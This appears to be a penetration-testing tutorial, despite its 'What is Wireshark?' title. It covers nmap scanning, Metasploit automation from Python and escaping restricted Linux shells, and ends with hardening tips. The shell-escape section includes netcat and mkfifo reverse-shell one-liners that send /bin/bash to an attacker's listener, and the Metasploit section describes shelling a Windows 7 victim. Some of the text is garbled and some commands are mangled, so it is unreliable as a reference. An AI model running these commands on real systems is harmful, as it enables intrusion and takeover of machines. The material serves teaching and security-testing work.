What is Wireshark?

The target is located and now comes the next phase in the hunt, to find your weakness, to catch you off guard, and without your knowledge, find your “soft spot”. The lowest fruit in the tree, That’s what the hacker it’s looking for, to be able to penetrate and own the system. What are the possible points of entry and how to prevent this exploits? Knowing your opponent’s tactics will make you invulnerable, port scanning, Nmap and much more.

They do not require much knowledge to understand this fabulous tool that will be very useful to perform scans.

NMAP is a very good tool to scan networks and ports, it was originally created for Linux but today it is already multiplatform, it was written by Gordon Lyon. Later we will encourage the use of this tool will surprise you with everything you can do in a simple way.

As a first step, we must install nmap in Linux Ubuntu with the following command.

sudo apt-get update
sudo apt-get install nmap

This command pings the range of indicated addresses and will result in the IP addresses that are in use.

These are the most basic commands that will help us understand the following examples:

-sT: TCP scan, the most noisy.
-sS: SYNC scanning, it is the quietest and most used.
-sF: FIN scan.
-sP: Ping Scan.
-sU: Displays UDP ports.
-O: Shows Operating System.
-V: Shows all the steps.
-sL: List Scan

Now we start with -sP and observe the results of our laboratory network.

-sP: Ping Polling – Only determines if the target is alive

sudo nmap -sP 172.31.2.0/24

This command shows the devices connected to the network, in the following we see an example of a domestic network.

-sL: List polling – Simply list the objectives to be analyzed

sudo nmap -sL172.31.2.0/24

End of the previous command

The image below shows a real example of a home network and shows all devices connected mostly cell phone.

sudo nmap -sL 192.168.1.0/24

In the next image, we see the results of the command line below and then we write it in a Linux terminal, it shows us the state of the ports in the range of IP addresses indicated.

sudo nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | grep open

sudo nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2 " " $3}'

In nmap it is not necessary to choose a range of IP addresses, you can also do to a specific address. Below we have other commands and their results for you to analyze their results.

sudo nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' | wc -l

sudo nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}'

sudo nmap -Pn -sV -T 5 -oG - 172.31.2.* -p 21,22,80,443,1433,3389 | awk '/open/{print $2}' > ~/labnet-ip-list.txt

cat labnet-ip-list.txt

nmap is a potent tool that every pentester must know 100%. That’s why we invite you to do more tests in our lab, something beneficial would be to export a list.txt of the hosts that are found in a network together with the ports of our interest.

The previous examples were done in our laboratory network and a domestic system but imagine the amount of information you can obtain in a company that has at least 100 hosts.

In the world has the Metasploit cyber attacks and Python plays a significant role then we will show you the combination of these two elements.

Metasploit: is one of the most famous frameworks for those dedicated to computer security and more specifically to the exploitation of vulnerabilities.

One of the characteristics that makes it robust and flexible is the possibility of creating exploits and modules. The most common language used to develop such exploits is Ruby, however in Python it is also possible to develop them, thanks to libraries like python-msfrpc.

Python: is an object-oriented programming language.

We know that Metasploit is written in ruby; therefore the scripts made in Python will not be compatible. Additional configuration is required for this combination to be possible. This will be very useful for process automation.

Having an idea of ​​what the purpose of this document or article is. We can start by saying that we have two libraries or libraries (pymetasploit from allfro and python-msfrpc from SpiderLabs) to achieve this fusion or combination.

Step 1:

Installation of libraries

Open a linux terminal and write the following command line.

$ sudo git clone https://github.com/allfro/pymetasploit

If the previous command line shows some error, you must write the following command.

$ sudo apt-get install git

Step 2:

With the following command we enter the folder of the repository that we have downloaded, and with the command “ls” we verify that it contains the folder.

$  cd pymetasploit

$ ls

Step 3:

$sudo python setup.py install

Step 4:

With the following command, we consult the options that we have shown in the next image.

$ msfrpcd -h

Step 5:

After seeing the options with the previous step, we can start as follows:

# msfrpcd -P password -n -f -a 127.0.0.1

This is another way to start. $ msfrpcd -U “user” -P password -f -a ip for example:

$ msfrpcd -U infosecaddicts -P 12345678 -f -a 127.0.0.1

So far we have run the daemon in the foreground.

Step 6:

Now we are going to make our first python script interacting with Metasploit.

open terminal linux

$ idle2

After entering the above command in the Linux terminal, this window will appears.

We create a new file.

Step 7:

After creating the file we write the following.

 

# we import the necessary libraries
from metasploit.msfrpc import MsfRpcClient
# msfrpcd -U infosecaddicts -P 12345678 -f -127.0.0.1
# we create an object
cli = MsfRpcClient(username=”infosecaddicts” , password=”12345678”, ip=”127.0.0.1”)
# we create a list
listoobj = cli.modules.exploits
for i in listobj:
    if “windows” in i:
        if “smb” in i:
            print i

Press F5 to execute our code.

We will have the next image as output.

This is another way to test the previous script

$ python msf.py

In the previous example we interact with Metasploit from python; with only seven lines of code, we show a list of all exploit that contain the word “windows” and “smb”, this example at the beginning of all connection with Metasploit.

This second example is a bit more complex, and we will use the code found in the following repository as a guide. https://github.com/vmvarga/msfpython-scripts/blob/master/task1.py

With the following command, we will clone the repository that we will analyze

$ git clone https://github.com/vmvarga/msfpython-scripts

We enter the folder and review the file task1.py in the following way.

$ cd msfpython-scripts

$ vim task1.py

For this second example we start with the analysis of the code.

We import the necessary libraries for this script.

We declare variables and the ip addresses are edited depending on the network in which we are connected.

In this part, three functions were created with their parameters, which will be used later.

In the next image, we have the commands that run in the Metasploit console. These may vary depending on the type of attack .

In the next part of the code we can edit it to change exploit. payload, LPORT, LHOST

In this last part of the code, we have the iterations. and we also give run a metasploit to test our code.

If the previous code seemed very long and complicated, then you have a better summary and easy to understand with which you can make your first attack. This example is composed of a LAN, a host with Windows 7 that will be our victim and finally a host with Linux Ubuntu that will be our attacker; we assume that you already perform a scan with nmap and you have the ip address of the objective.

$ msfrpcd -U infosecaddicts -P 12345678  -a 127.0.0.1 -f

In the following image it is in complete code with which we obtain a reverse shell from python using metasploit; with only 9 lines of code.

The order of the previous code would be the next pyramid, we declare the libraries or modules to use that which we already know, then we have the object CLI, and finally, we have the configuration of the exploit.

To execute a Metasploit code we have to continue with the following structure.

console.execute (“Here are msfconsole commands in quotation marks”)

After the explanation, we move on to the execution in the following way, even though you may tremble from a linux terminal or by clicking on the .py file.

Here we have the result of the automation of Metasploit with python, you can save them and execute it whenever you want and many times you want, with much less time than in the Metasploit console. You can have the attacks ready for when you want.

 

Restrictive shells:

Restricted shells can be described as a well-known feature for Penetration Testers or Linux professionals. But mane security and IT experts can avoid it in general. These shells are a conceptual shell provided with restricted credentials that work under a particular environment. Allowing the users to use the minimum capacity to perform basic tasks.

These restrictions are useful for the Linux administrators. They often need to provide shell access to a specific user to perform management activities.  So it’s necessary to restrict these shells to control any problem that may appear for the access to these shells.

The escape process related to these restrictions is just one part of a penetration test. This is designed to escalate the privileges that restrict the access to sensitive shells. These aspects can be used to gain upper hand shells and gain root access which is desirable. This depends mostly on the different files information that we can use to gain a broad knowledge of the environment. For example, user and service enumeration or some credentials can serve as lead to look for information into the system. It can also escalate the restrictions. The methodology used for this is based on three fundamental aspects-

1. knowledge
2. environment features
3. users creativity

Common restricted shells:

There are many different shells available to choose some that are just necessary shells without severe restrictions like “rbash” (Restricted bash), maybe “rzsh” or “rksh” (Korn shell on restricted mode). These types of shells are straightforward and easy to bypass. Others types of shells are the ones who can redesign the whole administrator environment like “lshell” which are full configurable shells.

The characteristics that are included on configured shells are most of the times left to the users due to the accessibility aspect for work. However, some administrators create an unsecured path on the shells that lead to escalation privileges due to the lack of restrictions, that is the main reason and importance of the configurable shells.

Gathering  Environment Information:

Once we got access to through the restrictive shells, the next step is to gain information about the environment and find information about which kind of restricted shell we are working on, by doing this we can know which techniques can be helpful to escalate privileges and gain sensitive information. Here some steps that can be used to gather information about the system:

•  Check for commands with SUID credentials, especially the commands that are owned by “root” user that can be the critical point to escape the current shell and escalate stages.
• Also check the number of commands that you can run applying “sudo”. This way we can check if we can execute a program using a personal password.
• Check any command by hitting TAB key once or twice or typing the commands by hand.
• See if the languages are available like “python” or “ruby,” it may come handy on further examples
• Check for characters that can be used to escape like: “;” (colon), “$” (shell execution ta), “&” (background support).
• Check each one of the commands that may appear available if you don’t know their function looks for it; it may possess some hidden arguments that can be helpful.
• Finding out, which shell are you located may not be just as smooth as it seems, but you can dig through the error message that gives you hints to find out. Applying a command to issuing errors like on the examples below:

rbash:

rksh:

rzsh:

As we can see on the pictures, some shells provide their names on the system error messages some other might not, if you look into the shell manual and configuration and the types of errors that may be present on their configuration, this can be useful on the future to identify other types of shells.

Common initial techniques:

There are some helpful techniques that we can be used to escape restricted shells or be used to access one stage of the system, that’s it has restricted policies. Many of these techniques rely merely on Linux variable pollution use or command escape characters, here are some of these techniques:

• Console editors:

The system provides default editors like vim, pico, nano or ed. Some of these editors can provide file browsing features. Vim provides one of the most notorious bypasses on shell restrictions due to its capacity to run command and script while using the tool, to check these aspects apply the following command if Vim is available:

type this inside vim interface :!/bin/ls – 1 .b*

On the picture below you can see that we manage to execute /bin/sh using Vim, now thanks to the features provided by Vim we can run commands on sh that was not available to zbash shell.

Another example of this method is ed which is an old console editor, often ed is provided to the user’s because it doesn’t represent high difficulties to use it, but it also possesses third party command execution features, quite similar to vim we can run scripts and command within ed to compromise our current shell. Once we are located within ed interface, we can escape the standard shell by executing the one shown below:

 

We managed to escape the respective shell and move to a different directory and take a look over files that the system did not allow before. Another editor is “ne” which is designed to be simple and efficient a replacement for “vim”. ne directory possess particular characteristics that allows the users to load configuration preferences. This can be used to read the files. Once we managed to open “ed” hit the “ESC” key, once you have accessed the main configuration menu go to the last menu showed on “prefs” window and enter to the option “load profile.” as it can be seen we can escalate almost any directory from there.

We can even access etc file from there and see each folder available to access:

– Pager commands:

Pagers on Linux are a utility that allows users to see the output of a specific command or text file that is too big for the screen to show. The two most known pagers are: “more” and “less,” these two also have escape features to execute scripts. If we open a file long enough and simple text: “ !’sh’ “ we can access a new shell and avoid the restricted shell. In the example below we use “more” to check its skip capabilities:

Now we have to do the same with “less” to see the difference:

pinfo and man commands:

The “man” command can be used to display manual pages for the commands, it also posses escape characteristics. Man uses more and less as default papers, but it works with others papers achieving the same results. On the other hand, pinfo is an information command that has skip features as well. When the ls command output appears to use the same method used for the pagers to access the new shell:

If we repeat the same process for pinfo, we can alter the status of a forbidden command like “ls”. We can achieve this using the following command

$pinfo ls

After the manual interface appears we can hit “ ! “ exclamation mark to access the command execution characteristic and we can execute some simple commands that weren’t allowed on the first shell. like “ cd /etc.” or “ ls /etc”

If we do that we can notice that we just bypassed the previous shell and we are now able to execute some commands that were blocked, now if we put this example on a real case scenario we can use “ nc” command to create a port listening on a victim machine. For this we need another PC connected within our network to serve as an example of the command:

We use pinfo again but in our victim pc to execute the command “ nc -victim ip address– -e /bin/bash. After hitting enter if the screen gets black is because probably we executed the command. This type of access is known as “reverse shell” as we set up before the victim machine is configured to listen on port 5000 and throw its /bin/bash to the attacker if we get to the attacker VM we can use the following command to listen on the address that we put before:

$nc -lvp 5000

We can now see that there’s a connection created to the victim’s location and we can explore through the files available with the user access.

The Swiss Army Tool:

As we could see we could find a sideway to get advantage on the restrictive shells, the use of “nc” command to gain access to the victim’s machine. It is known as network swiss army tool because is not common for administrators to disable its use on network environment so professionals can use it to establish a connection through ports.

One of the setbacks that we can draw from the use of “nc” command is that most of the security managers configure restrictions to use just as root users. Another aspect to mention is that “nc command” depends on the BSD version in use, so probably it will be no available use flags as -c or -e that makes almost impossible to inject a flag using “nc”

Although there are others ways to gain access using nc. is using deep knowledge of Linux system and type some commands like this on the victim machine to get a reverse shell:

$ rm -f /tmp/f; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc -l victim address> 5000 > /tmp/f”

Analyzing the commands:

If we analyze these commands, we can notice that there are separated by parts with “;”. The first part is placed to erase the “/tmp/if” file if there’s one, the second command creating the same file but as a FIFO file. This is a special type of file that means (first in, first out) it resembles a pipe because several processes can open it for reading or writing procedures and this file is going to serve as a data exchange for the “nc command “ and the interactive shell.

The third command does a variety of things first of all it opens the FIFO file that we created and pipes out the content to a shell with interactive capabilities on (/bin/sh -i). Also it can redirect any error to the standard output result (2> &1), at last the piping files are sent through the reverse shell configured on the port listening (5000) if we connect on our attacker PC it sure it will display the shell.

Note: This kind of command use is very tricky and hard to use but is presented as an alternative to executing a reverse shell without the regular access, it depends on several factors that can make the command files.

Console browsers:

This type of methods is related to the Linux browser around is a well-known process, and it uses things such as “links”, “elinks” and “lynx” the use of browser are pretty decent option to escape restrictive shells as well.

Let’s take “links” for one example, if we open an specific website with a text box we can hit ESC key and it will display the menu, then you can get access through file and then click into Os shell and there you go an instant shell.

Another example of the use of browser to create a new shell is “lynx”, after opening lynx and used to load any website that contains a text box to scan like “google.com” for instance. by hitting the key “o”  lynx will proceed to open the options available for the page where an alternative editor can be configured:

With linx we can use the text editor like vim within the browser just like we do it before on the pager. Both of the browser “links” and “lynx” can adapt this concept- we have to edit the box that applies to the editor location and use on the search box once we have configured it.

we can also get these results through console with the following command that imports the editor as an argument within the browser

$ lynx –editor=/usr/bin/vim www.google.com

Mutt Command:

mutt is a console email reader, it can be also used to create a new shell and skip restrictive shells, in order to create a new shell we just have to simply hit “ ! “ and this instruction will open a new command execution within mutt, then we try to open a new shell to see the results:

Find command:

Find is a well-known command used to find files within Linux systems. It possess several characteristics, each of one that we need to mention today is “-exec” which allows us to execute a new shell, let’s used to skip a restrictive shell:

It can be seen that we could visualize /etc. directory and also some of their files, find is a very useful command, but the “-exec” mode can only execute commands that are allowed to be used by the users. This method can be useful on zbash or rksh shells, but a different shell with more restricted parameters wouldn’t be so valuable.

Nmap Command:

Nmap is one of the most popular scanners around  the world. Security professionals use it in a restrictive shell although it is very rare to see that they allow nmap configuration. For example, nmap posses a feature called “–interactive” which provides a console where some commands can be executed.

Note: the nmap versions that allow doing this are the versions previous to 2009.

When you are scanning through old Linux distributions is common to find outdated versions of software there, so this is helpful to use and escalate the restrictions. nmap interactive mode can be used as is shown below:

$ nmap –interactive

nmap> !sh

$

As it can be seen the command that deploys the new shell resembles the one used for pagers and editors.

Programming Techniques:

Programming languages are a great resource to execute different commands and different applications to avoid shells restrictions, show examples of methods that can be used with programming, may have no end, so we are going to analyze some of the most common methods of programming commands:

awk command:

awk is designed for text processing is a special feature included in most of the UNIX operating system, for that reason is almost sure that we can execute this command on every Linux platform.

It posses several features like “print ()” and “ sprintf() “, the function that we are going to use to create a new shell is called “system ()” it allows us to execute /bin/sh in the system as it can be seen below:

Expect command:

Expect command is another example of language, but we can describe it as talk script that talks to other interactive programs, that means we can create a script and execute some interesting functions like “spawn ()” which allow us to drive an interactive shell using its control functions:

Python :

Python is a useful language to work on several aspects due to its flexibility and reliability. It possesses an extensive library and several applications here we can also use “system ()” within python and “pty ()” and some others to execute a new shell:

Ruby:

You can also apply the same procedure(Python) with ruby which is a versatile language as well. We can get through a new shell using irb (interactive ruby shell) from there we can call a new shell:

We can also send the shell through a listening port like we did with nc command using the command shown below:

On the attacker machine:

Perl:

Perl can execute “ system () “ method to execute forbidden commands like we saw earlier and also you can use run using /bin/sh and “exec()” command to achieve this purpose.

We can also use perl to send shell from the victim to a listening port like in the example shown below:

On the attacker machine:

PHP:

Php language possess several options like the ones we mentioned before with other languages, “system()” and “exec()” you can apply these features within or without php console. here is an example of this:

Conclusion:

As we saw through the entire explanation of the methods, there are several ways to skip or bypass restrictive shells. For example, using application pre-installed on the system or manipulating new applications to access the forbidden files. The current advancement of new applications and tools makes almost impossible to protect. But some recommendations can make a shell a little more secure to these methods.

Recommendations:

1.  It’s better to set your environment with “allowed commands” and not the other way around. The number of commands that you may know posses a skip feature. This is lower than the ones you don’t don’t know anything about
2. Checking the allowed commands is always a good practice. This is to see if any command can interact with Linux variables to restrict those parameters
3. if any command allowed posses skipping features, use restrict versions of the commands like

• rvim
• rnano
• red

4. While using a software that uses third-party options like a external editor. Restrict their access to be able only to read the content and not modify the variables content.
5. Scripts those than can invoke other scripts are especially dangerous when running with different users credentials, so it’s better to avoid the use of these.
6. Keep the allowed command list to the necessary minimum in order to protect your environment.
7. If the use of pagers is necessary consider to avoid more or less and provide pagers that don’t possess skipping shell like most.
8. Try to avoid the use programming languages and it’s that not possible considered to restrict the function like “system()”, “exec()” and “pty()”.